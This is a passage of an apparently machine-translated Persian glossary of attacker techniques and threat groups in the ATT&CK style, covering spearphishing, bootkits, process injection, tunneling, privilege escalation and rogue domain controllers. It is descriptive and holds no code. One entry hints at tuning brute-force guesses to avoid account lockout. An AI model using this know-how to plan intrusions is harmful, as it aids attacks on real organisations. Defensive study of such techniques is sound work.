دشمنان ممکن است ایمیل های spearphishing را با یک پیوند مخرب ارسال کنند تا به سیستم های قربانی دسترسی پیدا کنند. Spearphishing با پیوند یک نوع خاص از spearphishing است. این روش با سایر اشکال spearphishing متفاوت است زیرا از پیوندها برای دانلود بدافزار موجود در ایمیل استفاده می کند، به جای پیوست کردن فایل های مخرب به خود ایمیل، برای جلوگیری از دفاعی که ممکن است پیوست های ایمیل را بررسی کند. Spearphishing همچنین ممکن است شامل تکنیک های مهندسی اجتماعی، مانند خودنمایی به عنوان یک منبع قابل اعتماد باشد. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این مورد، ایمیل های مخرب حاوی لینک هستند. به طور کلی، پیوندها با متن مهندسی اجتماعی همراه می‌شوند و از کاربر می‌خواهند که فعالانه روی یک URL کلیک یا کپی و در یک مرورگر جای‌گذاری کند و از اجرای کاربر استفاده کند. وب سایت بازدید شده ممکن است با استفاده از یک سوء استفاده، مرورگر وب را به خطر بیاندازد، یا از کاربر خواسته می شود برنامه ها، اسناد، فایل های فشرده یا حتی فایل های اجرایی را بسته به بهانه ایمیل در وهله اول بارگیری کند. دشمنان همچنین ممکن است پیوندهایی را شامل شوند که برای تعامل مستقیم با یک ایمیل خوان، از جمله تصاویر جاسازی شده برای سوء استفاده مستقیم از سیستم نهایی یا تأیید دریافت ایمیل (مانند اشکالات وب/بیکن های وب) در نظر گرفته شده است. پیوندها همچنین ممکن است کاربران را به برنامه‌های مخربی که برای سرقت نشانه‌های دسترسی برنامه‌ها طراحی شده‌اند، مانند نشانه‌های OAuth، هدایت کنند تا به برنامه‌ها و اطلاعات محافظت شده دسترسی پیدا کنند.

فیشینگ: Spearphishing از طریق سرویس

Phishing: Spearphishing via Service

دشمنان ممکن است از طریق سرویس های شخص ثالث پیام های spearphishing ارسال کنند تا به سیستم‌های قربانی دسترسی پیدا کنند. spearphishingاز طریق سرویس یک نوع خاص از spearphishingاست. این روش با سایر اشکال spearphishingمتفاوت است زیرا از خدمات شخص ثالث به جای مستقیم از طریق کانال های ایمیل سازمانی استفاده می کند. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان پیام‌هایی را از طریق سرویس‌های مختلف رسانه‌های اجتماعی، ایمیل شخصی و سایر سرویس‌های غیر سازمانی ارسال می‌کنند. این سرویس ها به احتمال زیاد سیاست امنیتی کمتری نسبت به یک شرکت دارند. مانند بسیاری از انواع spearphishing، هدف ایجاد ارتباط با هدف یا جلب علاقه هدف به طریقی است. دشمنان حساب‌های شبکه‌های اجتماعی جعلی ایجاد می‌کنند و به کارکنان برای فرصت‌های شغلی بالقوه پیام می‌دهند. انجام این کار دلیل قابل قبولی برای پرسیدن در مورد سرویس‌ها، خط مشی‌ها و نرم افزارهایی که در یک محیط اجرا می شوند، می دهد. سپس دشمن می تواند پیوندهای مخرب یا پیوست‌ها را از طریق این سرویس ها ارسال کند. یک مثال متداول این است که از طریق رسانه‌های اجتماعی با یک هدف ارتباط برقرار کنید، سپس محتوا را به یک سرویس ایمیل شخصی هدف که در رایانه کاری خود استفاده می کند، ارسال کنید. این به حریف اجازه می‌دهد تا برخی از محدودیت‌های ایمیل در حساب کاری را دور بزند و هدف احتمال بیشتری دارد که فایل را باز کند زیرا چیزی است که انتظارش را داشت. اگر محموله آن طور که انتظار می رود کار نکند، دشمن می تواند به ارتباطات عادی ادامه دهد و با هدف در مورد نحوه کارکرد آن عیب یابی کند.

فیشینگ برای اطلاعات

Phishing for Information

دشمنان ممکن است پیام‌های فیشینگ ارسال کنند تا اطلاعات حساسی را که می‌تواند در هنگام هدف‌گیری استفاده شود، استخراج کنند. فیشینگ برای اطلاعات، تلاش برای فریب اهداف برای افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. فیشینگ برای اطلاعات با فیشینگ متفاوت است زیرا هدف جمع‌آوری داده‌ها از قربانی به جای اجرای کد مخرب است.

فیشینگ برای اطلاعات: سرویس Spearphishing

Phishing for Information: Spearphishing Service

دشمنان ممکن است از طریق سرویس‌های شخص ثالث پیام‌هایspearphishing ارسال کنند تا اطلاعات حساسی را که می‌توان در طول هدف‌گیری مورد استفاده قرار داد استخراج کرد. Spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. Spearphishing برای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطر انداختن حساب‌ها) و/یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان از طریق سرویس‌های مختلف رسانه‌های اجتماعی، ایمیل شخصی و سایر سرویس‌های غیر سازمانی، پیام‌هایی را ارسال می‌کنند. این سرویس‌ها به احتمال زیاد سیاست امنیتی کمتری نسبت به یک شرکت دارند. مانند بسیاری از انواع spearphishing، هدف ایجاد ارتباط با هدف یا جلب علاقه هدف به طریقی است. دشمنان ممکن است حساب‌های رسانه‌های اجتماعی جعلی ایجاد کنند و برای فرصت‌های شغلی بالقوه به کارکنان پیام دهند. انجام این کار دلیل قابل قبولی برای پرسش در مورد خدمات، خط مشی‌ها و اطلاعات در مورد محیط آنها می‌دهد. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانیان جستجو) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

فیشینگ برای اطلاعات: پیوست Spearphishing

Phishing for Information: Spearphishing Attachment

دشمنان ممکن است پیام‌های spearphishingرا با یک پیوست مخرب ارسال کنند تا اطلاعات حساسی را که می‌توان در طول هدف‌گیری استفاده کرد، استخراج کرد. spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. spearphishingبرای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطرانداختن حساب‌ها)و یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان یک فایل را به ایمیل spearphishingپیوست می‌کنند و معمولاً به گیرنده تکیه می‌کنند که اطلاعات را پر می‌کند و سپس فایل را برمی‌گرداند. متن ایمیل spearphishingمعمولاً سعی می‌کند دلیل قابل قبولی برای پر کردن فایل ارائه دهد، مانند درخواست اطلاعات از یک همکار تجاری. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در وب‌سایت‌های متعلق به قربانی) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

فیشینگ برای اطلاعات: پیوند spearphishing

Phishing for Information: Spearphishing Link

دشمنان ممکن است پیام‌های spearphishingرا با یک پیوند مخرب ارسال کنند تا اطلاعات حساسی را که می‌تواند در هنگام هدف‌گیری استفاده شود، استخراج کند. spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. spearphishingبرای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطر انداختن حساب‌ها) و/یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishingبه صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، ایمیل‌های مخرب حاوی پیوندهایی هستند که عموماً با متن مهندسی اجتماعی همراه هستند تا کاربر را ترغیب کنند تا به طور فعال یک URLرا کلیک یا کپی و در مرورگر جای‌گذاری کند. وب سایت داده شده ممکن است از نظر ظاهری بسیار شبیه به یک سایت قانونی باشد و دارای یک URL حاوی عناصری از سایت واقعی باشد. از وب سایت جعلی، اطلاعات در فرم های وب جمع آوری شده و برای مهاجم ارسال می‌شود. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در وب‌سایت‌های متعلق به قربانی) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

بوت قبل از سیستم عامل

Pre-OS Boot

دشمنان ممکن است از مکانیسم‌های Boot Pre-OS به عنوان راهی برای ایجاد پایداری در یک سیستم سوء استفاده کنند. در طول فرآیند بوت شدن کامپیوتر، سیستم عامل و سرویس های راه اندازی مختلف قبل از سیستم عامل بارگذاری می شوند. این برنامه ها جریان اجرا را قبل از اینکه سیستم عامل کنترل کند کنترل می کنند. دشمنان ممکن است داده ها را در درایورهای بوت یا سیستم عامل مانند BIOS و UEFI بازنویسی کنند تا روی سیستم ها در یک لایه زیر سیستم عامل باقی بمانند. شناسایی این امر به ویژه دشوار است زیرا بدافزار در این سطح توسط دفاع های مبتنی بر نرم افزار میزبان شناسایی نمی شود.

بوت قبل از سیستم عامل: سیستم عامل

Pre-OS Boot: System Firmware

دشمنان ممکن است سفت‌افزار سیستم را تغییر دهند تا در سیستم‌ها باقی بماند. ( BIOSسیستم ورودی/خروجی اولیه) و رابط میان‌افزار توسعه‌پذیر یکپارچه (UEFI )یا رابط سفت‌افزار توسعه‌پذیر ( EFI) نمونه‌هایی از میان‌افزار سیستم هستند که به عنوان رابط نرم‌افزاری بین سیستم عامل عمل می‌کنند. و سخت افزار کامپیوتر. سیستم عامل سیستم مانند BIOS و (UEFI ) زیربنای عملکرد یک کامپیوتر است و ممکن است توسط یک دشمن برای انجام یا کمک به فعالیت های مخرب اصلاح شود. قابلیت‌هایی برای بازنویسی میان‌افزار سیستم وجود دارد، که ممکن است به دشمنان پیچیده ابزاری برای نصب به‌روزرسانی‌های سیستم‌افزار مخرب به‌عنوان وسیله‌ای برای تداوم در سیستمی که تشخیص آن ممکن است دشوار باشد، بدهد.

بوت پیش از سیستم عامل: کامپوننت سخت‌افزار

Pre-OS Boot: Component Firmware

دشمنان ممکن است سخت‌افزار جزء را تغییر دهند تا در سیستم‌ها باقی بماند. برخی از دشمنان ممکن است از ابزارهای پیچیده برای به خطر انداختن اجزای رایانه و نصب سیستم عامل مخرب استفاده کنند که کدهای دشمن را خارج از سیستم عامل و سیستم عامل اصلی سیستم یا بایوس اجرا می کند. این تکنیک ممکن است شبیه به سیستم سخت‌افزار باشد، اما روی سایر اجزا/دستگاه‌های سیستم که ممکن است توانایی یا سطح بررسی یکپارچگی یکسانی نداشته باشند، انجام می‌شود. سخت‌افزار مؤلفه‌های مخرب می‌تواند یک سطح دائمی از دسترسی به سیستم‌ها را علی‌رغم شکست‌های معمول بالقوه در حفظ دسترسی و تصاویر دوباره هارد دیسک، و همچنین راهی برای فرار از دفاع مبتنی بر نرم‌افزار میزبان و بررسی‌های یکپارچگی فراهم کند.

بوت پیش از سیستم عامل: Bootkit

Pre-OS Boot: Bootkit

دشمنان ممکن است از بوت کیت ها برای تداوم در سیستم ها استفاده کنند. بوت کیت ها در یک لایه زیر سیستم عامل قرار دارند و ممکن است انجام اصلاح کامل را دشوار کنند، مگر اینکه سازمانی مشکوک به استفاده از آن باشد و بتواند مطابق با آن عمل کند. بوت کیت یک نوع بدافزار است که بخش‌های بوت یک هارد دیسک، از جمله (MBR) و (VBR) را تغییر می‌دهد. MBR بخشی از دیسک است که برای اولین بار پس از تکمیل اولیه سازی سخت افزار توسط BIOS بارگذاری می شود. محل بوت لودر است. دشمنی که دسترسی خام به درایو راه‌اندازی دارد، ممکن است این ناحیه را بازنویسی کند و اجرا را در هنگام راه‌اندازی از بوت‌لودر معمولی به کد دشمن منحرف کند. MBR کنترل فرآیند بوت را به VBR می دهد. مشابه مورد MBR، دشمنی که دسترسی خام به درایو بوت دارد، می‌تواند VBR را بازنویسی کند تا اجرا را در هنگام راه‌اندازی به کد دشمن منحرف کند.

بوت پیش از سیستم عامل: ROMMONkit

Pre-OS Boot: ROMMONkit

دشمنان ممکن است از نمایشگرROM (ROMMON)با بارگذاری یک سفت‌افزار غیرمجاز با کد حریف برای ارائه دسترسی مداوم و دستکاری رفتار دستگاه که تشخیص آن دشوار است، سوء استفاده کنند. ROMMON یک سفت‌افزار دستگاه شبکه سیسکو است که به‌عنوان بوت‌لودر، تصویر راه‌اندازی یا کمک‌کننده راه‌اندازی برای مقداردهی اولیه سخت‌افزار و نرم‌افزار هنگام روشن شدن یا بازنشانی پلت‌فرم عمل می‌کند. مشابه با TFTP Boot، دشمن ممکن است تصویر ROMMON را به صورت محلی یا از راه دور (به عنوان مثال، از طریق TFTP) با کد دشمن ارتقا دهد و دستگاه را مجددا راه اندازی کند تا تصویر ROMMON موجود را بازنویسی کند. این به دشمنان ابزاری را برای به روز رسانی ROMMON برای به دست آوردن پایداری در یک سیستم به روشی که ممکن است تشخیص آن دشوار باشد، ارائه می دهد.

بوت قبل از سیستم عامل: بوت TFTP

Pre-OS Boot: TFTP Boot

دشمنان ممکن است از راه‌اندازی شبکه برای بارگیری یک سیستم عامل شبکه غیرمجاز از یک سرور پروتکل انتقال فایل ( TFTP)استفاده کنند. TFTP بوت راه‌اندازی شبکه معمولاً توسط مدیران شبکه برای بارگیری تصاویر دستگاه شبکه با پیکربندی از یک سرور مدیریت متمرکز استفاده می‌شود. Netbooting یکی از گزینه‌های توالی بوت است و می‌توان از آن برای متمرکز کردن، مدیریت و کنترل تصاویر دستگاه استفاده کرد. دشمنان ممکن است پیکربندی دستگاه شبکه را دستکاری کنند که استفاده از یک سرور TFTP مخرب را مشخص می‌کند، که ممکن است همراه با Modify System Image برای بارگذاری تصویر تغییر یافته در راه‌اندازی یا بازنشانی دستگاه استفاده شود. تصویر غیرمجاز به دشمنان اجازه می‌دهد تا پیکربندی دستگاه را تغییر دهند، قابلیت‌های مخرب را به دستگاه اضافه کنند و درهای پشتی را برای حفظ کنترل دستگاه شبکه و در عین حال به حداقل رساندن شناسایی از طریق استفاده از یک عملکرد استاندارد، معرفی کنند. این تکنیک مشابه ROMMONkit است و ممکن است منجر به اجرای یک تصویر تغییر یافته توسط دستگاه شبکه شود.

افزایش امتیاز

Privilege Escalation

دشمن در تلاش است تا مجوزهای سطح بالاتر را به دست آورد. افزایش امتیاز شامل تکنیک هایی است که دشمنان برای به دست آوردن مجوزهای سطح بالاتر در یک سیستم یا شبکه استفاده می کنند. دشمنان اغلب می‌توانند وارد شبکه‌ای با دسترسی غیرمجاز شده و آن را کاوش کنند، اما برای پیگیری اهداف خود به مجوزهای بالا نیاز دارند. رویکردهای رایج استفاده از نقاط ضعف سیستم، پیکربندی نادرست و آسیب پذیری ها است. نمونه‌هایی از دسترسی بالا عبارتند از: سطح سیستم / ریشه، مدیر محلی، حساب کاربری با دسترسی ادمین، حساب های کاربری با دسترسی به سیستم خاص یا انجام عملکرد خاصی این تکنیک‌ها اغلب با تکنیک‌های Persistence همپوشانی دارند، زیرا ویژگی‌های سیستم‌عامل که به دشمن اجازه می‌دهد تداوم داشته باشد، می‌توانند در یک زمینه بالا اجرا شوند.

فرآیند تزریق

Process Injection

دشمنان ممکن است برای فرار از دفاع مبتنی بر فرآیند و همچنین افزایش امتیازات، کد را به فرآیندها تزریق کنند. تزریق فرآیند روشی برای اجرای کد دلخواه در فضای آدرس یک فرآیند زنده جداگانه است. اجرای کد در زمینه یک فرآیند دیگر ممکن است امکان دسترسی به حافظه فرآیند، منابع سیستم/شبکه و احتمالاً امتیازات بالاتر را فراهم کند. اجرای از طریق تزریق فرآیند نیز ممکن است از شناسایی محصولات امنیتی جلوگیری کند زیرا اجرا تحت یک فرآیند قانونی پنهان شده است. راه های مختلفی برای تزریق کد به یک فرآیند وجود دارد که بسیاری از آنها از عملکردهای قانونی سوء استفاده می کنند. این پیاده‌سازی‌ها برای هر سیستم‌عامل اصلی وجود دارد، اما معمولاً پلتفرم خاصی هستند. نمونه‌های پیچیده‌تر ممکن است چندین فرآیند تزریق را برای بخش‌بندی ماژول‌ها انجام دهند و با استفاده از لوله‌های نام‌گذاری شده یا دیگر مکانیسم‌های ارتباط بین فرآیندی (IPC ) به عنوان کانال ارتباطی، از تشخیص بیشتر فرار کنند.

کشف خط مشی رمز عبور

Password Policy Discovery

ممکن است دشمنان سعی کنند به اطلاعات دقیق در مورد خط مشی رمز عبور استفاده شده در شبکه سازمانی یا محیط ابری دسترسی پیدا کنند. خط‌مشی‌های گذرواژه راهی برای اعمال رمزهای عبور پیچیده است که حدس زدن یا شکستن آن‌ها از طریق Brute Force دشوار است. این اطلاعات ممکن است به حریف کمک کند تا فهرستی از رمزهای عبور رایج ایجاد کند و حملات فرهنگ لغت و/یا brute force را که به این خط مشی پایبند است راه اندازی کند (مثلاً اگر حداقل طول رمز عبور باید 8 باشد، پس گذرواژه هایی مانند «pass123» را امتحان نکنید؛ بررسی نکنید. برای بیش از 3-4 رمز عبور در هر حساب، اگر قفل روی 6 تنظیم شده باشد تا حساب ها را قفل نکنید).

کشف دستگاه های جانبی

Peripheral Device Discovery

دشمنان ممکن است تلاش کنند اطلاعاتی در مورد دستگاه‌های جانبی متصل و اجزای متصل به یک سیستم کامپیوتری جمع آوری کنند. دستگاه‌های جانبی می‌توانند شامل منابع کمکی باشند که از انواع عملکردها مانند صفحه کلید، چاپگر، دوربین، کارت خوان هوشمند یا حافظه قابل جابجایی پشتیبانی می کنند. این اطلاعات ممکن است برای افزایش آگاهی آنها از سیستم و محیط شبکه استفاده شود یا ممکن است برای اقدامات بعدی مورد استفاده قرار گیرد.

کشف فرآیند

Process Discovery

ممکن است دشمنان سعی کنند اطلاعاتی در مورد فرآیندهای در حال اجرا در یک سیستم به دست آورند. اطلاعات به‌دست‌آمده می‌تواند برای به دست آوردن درک درستی از نرم‌افزار/برنامه‌های رایج در حال اجرا بر روی سیستم‌های درون شبکه استفاده شود. دشمنان ممکن است از اطلاعات Process Discovery در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. در محیط‌های ویندوز، دشمنان می‌توانند جزئیات مربوط به فرآیندهای در حال اجرا را با استفاده از ابزار Tasklist از طریق cmd یا Get-Process از طریق PowerShell به دست آورند. اطلاعات مربوط به فرآیندها را می توان از خروجی فراخوانی های Native API مانند CreateToolhelp32Snapshot نیز استخراج کرد. در مک و لینوکس، این کار با دستور ps انجام می شود. همچنین ممکن است دشمنان فرآیندها را از طریق proc / برشمارند.

پروتکل تونل سازی

Protocol Tunneling

دشمنان ممکن است ارتباطات شبکه را به و از یک سیستم قربانی در یک پروتکل جداگانه تونل کنند تا از شناسایی/فیلتر کردن شبکه جلوگیری کنند و/یا امکان دسترسی به سیستم‌های غیرقابل دسترس را فراهم کنند. تونل زنی شامل کپسوله کردن صریح یک پروتکل در پروتکل دیگری است. این رفتار ممکن است با ادغام با ترافیک موجود، ترافیک مخرب را پنهان کند و/یا یک لایه خارجی رمزگذاری (شبیه بهVPN ایجاد کند. تونل‌سازی همچنین می‌تواند مسیریابی بسته‌های شبکه را فعال کند که در غیر این صورت به مقصد مورد نظر خود نمی‌رسند، مانند SMB، RDP، یا سایر ترافیک‌هایی که توسط دستگاه‌های شبکه فیلتر می‌شوند یا از طریق اینترنت هدایت نمی‌شوند. ابزارهای مختلفی برای کپسوله کردن یک پروتکل در پروتکل دیگر وجود دارد. برای مثال، دشمنان ممکن است تونل‌سازی SSH را انجام دهند (همچنین به عنوان ارسال پورت SSH شناخته می‌شود)، که شامل ارسال داده‌های دلخواه بر روی یک تونل رمزگذاری‌شده SSH است.پروتکل تونل همچنین ممکن است توسط دشمنان در طول وضوح پویا مورد سوء استفاده قرار گیرد. که به عنوان DNS از طریق HTTPS (DoH) شناخته می شود، پرس و جوهایی برای حل زیرساخت C2ممکن است در بسته های HTTPS رمزگذاری شده کپسوله شوند.همچنین ممکن است دشمنان از Protocol Tunneling در ارتباط با پروکسی و/یا جعل هویت پروتکل برای پنهان کردن بیشتر ارتباطات و زیرساخت C2 استفاده کنند.

Proxy

دشمنان ممکن است از یک پروکسی اتصال برای هدایت ترافیک شبکه بین سیستم ها استفاده کنند یا به عنوان واسطه ای برای ارتباطات شبکه به سرور فرمان و کنترل عمل کنند تا از اتصال مستقیم به زیرساخت خود جلوگیری کنند. ابزارهای زیادی وجود دارند که هدایت ترافیک را از طریق پراکسی ها یا تغییر مسیر پورت امکان پذیر می کنند، از جمله HTRAN، ZXProxy و ZXPortMap دشمنان از این نوع پراکسی ها برای مدیریت و کنترل ارتباطات، کاهش تعداد اتصالات شبکه خروجی همزمان، ایجاد انعطاف پذیری در مواجهه با از دست دادن اتصال، یا سوار شدن بر مسیرهای ارتباطی مورد اعتماد موجود بین قربانیان برای جلوگیری از سوء ظن استفاده می‌کنند. دشمنان ممکن است چندین پروکسی را به هم متصل کنند تا منبع ترافیک مخرب را بیشتر پنهان کنند. دشمنان همچنین می‌توانند از طرح‌های مسیریابی در شبکه‌های تحویل محتوا ( CDN) برای فرمان پروکسی و کنترل ترافیک استفاده کنند.

گروه جاسوسی سایبری

Patchwork

Patchwork یک گروه جاسوسی سایبری است که برای اولین بار در دسامبر 2015 مشاهده شد. در حالی که این گروه به طور قطعی نسبت داده نشده است، شواهد غیرواقعی نشان می دهد که این گروه ممکن است یک نهاد طرفدار هند یا هند باشد. مشاهده شده است که Patchwork صنایع مرتبط با آژانس های دیپلماتیک و دولتی را هدف قرار می دهد. بسیاری از کدهای استفاده شده توسط این گروه از انجمن های آنلاین کپی و جایگذاری شده است. Patchwork همچنین در مارس و آوریل 2018 کمپین‌هایspearphishing را با هدف هدف قرار دادن گروه‌های اندیشکده ایالات متحده مشاهده شد.

گروه تهدید است

PittyTiger

PittyTiger یک گروه تهدید است که گمان می رود در خارج از چین فعالیت می کند و از انواع مختلف بدافزار برای حفظ فرمان و کنترل استفاده می کند.

یک گروه فعالیت

PLATINUM

PLATINUM یک گروه فعالیت است که حداقل از سال 2009 قربانیان را هدف قرار داده است. این گروه بر اهداف مرتبط با دولت ها و سازمان های مرتبط در جنوب و جنوب شرق آسیا متمرکز شده است.

گروه تهدید پرتغالی زبان

Poseidon Group

Poseidon Group یک گروه تهدید پرتغالی زبان است که حداقل از سال 2005 فعال بوده است. این گروه سابقه استفاده از اطلاعات استخراج شده از قربانیان برای باج‌گیری از شرکت‌های قربانی را برای عقد قرارداد با Poseidon Group به عنوان یک شرکت امنیتی دارد.

PROMETHIUM

PROMETHIUM یک گروه فعالیت متمرکز بر جاسوسی است که حداقل از سال 2012 فعال بوده است. این گروه عملیات های جهانی را با تاکید زیادی بر اهداف ترکیه انجام داده است. PROMETHIUM شباهت خود را با گروه فعالیت دیگری به نام NEODYMIUM به دلیل همپوشانی ویژگی های قربانی و کمپین نشان داده است.

گروه تهدید چینی

Putter Panda

پاتر پاندا یک گروه تهدید چینی است که به واحد 61486 از دوازدهمین دفتر اداره سوم ستاد کل ارتش (GSD) نسبت داده شده است.

تداوم امنیت سایبری

Persistence in cybersecurity

تداوم امنیت سایبری زمانی اتفاق می‌افتد که یک عامل تهدید به‌رغم ایجاد اختلالاتی مانند راه‌اندازی مجدد یا تغییر اعتبار، به طور محتاطانه دسترسی طولانی‌مدت به سیستم‌ها را حفظ کند. بازیگران بد می توانند یک ایمپلنت یا "خرد" بگذارند که هم از راه حل های آنتی ویروس خودکار فرار کند و هم بدافزار بیشتری را راه اندازی کند.

افزایش امتیاز

Privilege escalation

افزایش امتیاز نوعی حمله شبکه ای است که برای دسترسی غیرمجاز به سیستم ها در یک محیط امنیتی استفاده می شود. مهاجمان با یافتن نقاط ضعف در دفاع یک سازمان و دسترسی به یک سیستم شروع می کنند

رجیستری پرس و جو

Query Registry

ممکن است دشمنان با رجیستری ویندوز تعامل داشته باشند تا اطلاعات مربوط به سیستم، پیکربندی و نرم افزار نصب شده را جمع آوری کنند. رجیستری حاوی مقدار قابل توجهی اطلاعات در مورد سیستم عامل، پیکربندی، نرم افزار و امنیت است. اطلاعات را می‌توان به راحتی با استفاده از ابزارRegجستجو کرد، اگرچه ابزارهای دیگری برای دسترسی بهRegistryوجود دارد. برخی از اطلاعات ممکن است به دشمنان برای پیشبرد عملیات خود در یک شبکه کمک کند. دشمنان ممکن است از اطلاعاتQuery Registryدر حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می‌کند و یا اقدامات خاصی را انجام می‌دهد.

فیشینگ کد QR

QR code phishing

یک حمله فیشینگ که از یک کد QR مخرب به جای پیوند یا پیوست استفاده می کند.

شناسایی

Reconnaissance

شناسایی شامل تکنیک‌هایی است که دشمنان به طور فعال یا غیرفعال اطلاعاتی را جمع آوری می‌کنند که می‌تواند برای پشتیبانی از هدف‌گیری مورد استفاده قرار گیرد. چنین اطلاعاتی ممکن است شامل جزئیات سازمان قربانی، زیرساخت یا کارکنان/پرسنل باشد. این اطلاعات می‌تواند توسط دشمن برای کمک به سایر مراحل چرخه حیات دشمن استفاده شود، مانند استفاده از اطلاعات جمع‌آوری شده برای برنامه‌ریزی و اجرای دسترسی اولیه، محدوده و اولویت‌بندی اهداف پس از سازش یا هدایت و رهبری.

توسعه منابع

Resource Development

توسعه منابع تکنیک‌هایی هستند که شامل ایجاد، خرید، یا به خطر انداختن و سرقت منابع توسط دشمنان می‌شود که می‌تواند برای پشتیبانی از هدف گیری مورد استفاده قرار گیرد. چنین منابعی شامل زیرساخت‌ها، حساب‌ها یا قابلیت‌ها است. این منابع می‌توانند توسط دشمن برای کمک به سایر مراحل چرخه حیات دشمن استفاده شوند، مانند استفاده از دامنه‌های خریداری شده برای پشتیبانی از فرمان و کنترل، حساب‌های ایمیل برای فیشینگ به عنوان بخشی از دسترسی اولیه، یا سرقت گواهی‌های امضای شده.

تکرار از طریق رسانه‌های قابل جابجایی

Replication Through Removable Media

دشمنان ممکن است با کپی کردن بدافزار در رسانه‌های قابل جابجایی و استفاده از ویژگی‌هایAutorun به سیستم‌ها، احتمالاً آن‌هایی که در شبکه‌های قطع شده یا دارای شکاف هوا هستند، وارد شوند. در موردLateral Movement، این ممکن است از طریق اصلاح فایل‌های اجرایی ذخیره‌شده در رسانه‌های قابل جابجایی یا با کپی کردن بدافزار و تغییر نام آن به شکل فایلی قانونی برای فریب کاربران برای اجرای آن در یک سیستم جداگانه رخ دهد. در مورد دسترسی اولیه، این ممکن است از طریق دستکاری دستی رسانه، اصلاح سیستم‌هایی که برای قالب‌بندی اولیه رسانه استفاده می‌شوند، یا تغییر در خود سیستم عامل رسانه رخ دهد.

مخاطره DANGER

Risk DANGER

عبارت است از قرار گرفتن در معرض شرایطی که پتانسیل آسیب رسانی دارد. بالفعل شدن خطرات مانند نزدیک شدن به دستگاه در حال کار.

بارگذاری کد بازتابی

Reflective Code Loading

دشمنان ممکن است به طور بازتابی کد را در یک فرآیند بارگذاری کنند تا اجرای بارهای مخرب را پنهان کنند. بارگذاری انعکاسی شامل تخصیص و اجرای محموله‌ها مستقیماً در حافظه فرآیند است، به‌عنوان جایگزین ایجاد یک رشته یا فرآیندی که توسط یک مسیر فایل روی دیسک پشتیبانی می‌شود. بارهای بارگذاری شده به صورت بازتابی ممکن است به صورت باینری، فایل های ناشناس (فقط در RAM موجود) یا صرفاً حذف کدهای اجرایی بدون فایل (مثلاً: کد پوسته مستقل از موقعیت) کامپایل شوند. تزریق کد بازتابی بسیار شبیه به Process Injection است با این تفاوت که "تزریق" کد را به جای یک فرآیند جداگانه در حافظه خود فرآیندها بارگذاری می کند. بارگذاری انعکاسی ممکن است از تشخیص های مبتنی بر فرآیند دوری کند زیرا اجرای کد دلخواه ممکن است در یک فرآیند قانونی یا بدخیم پنهان شود. بارگذاری انعکاسی محموله‌ها مستقیماً در حافظه همچنین ممکن است از ایجاد فایل‌ها یا دیگر مصنوعات روی دیسک جلوگیری کند، در حالی که بدافزار را قادر می‌سازد تا این محموله‌ها را تا زمان اجرا رمزگذاری (یا به‌طور دیگری مبهم) نگه دارد.

کنترل کننده دامنه سرکش

Rogue Domain Controller

دشمنان ممکن است یک Domain Controller برای فعال کردن دستکاری داده های Active Directory ثبت کنند. DCShadow ممکن است برای ایجاد یک Domain Controller (DC) سرکش استفاده شود. DCShadow روشی برای دستکاری داده های اکتیو دایرکتوری از جمله اشیاء و طرحواره ها با ثبت (یا استفاده مجدد از یک ثبت نام غیرفعال) و شبیه سازی رفتار یک DC است. پس از ثبت نام، یک DC سرکش ممکن است بتواند تغییرات را در زیرساخت AD برای هر شی دامنه، از جمله اعتبارنامه ها و کلیدها، تزریق و تکرار کند. ثبت یک DC سرکش شامل ایجاد یک سرور جدید و اشیاء nTDSDSA در پارتیشن پیکربندی طرحواره AD است که به امتیازات Administrator یا دامنه یا محلی برای ( DC) یا هش KRBTGT نیاز دارد. این تکنیک ممکن است ثبت سیستم و مانیتورهای امنیتی مانند اطلاعات امنیتی و محصولات مدیریت رویداد ( SIEM) را دور بزند (زیرا اقدامات انجام شده در یک DC سرکش ممکن است به این حسگرها گزارش نشود). این 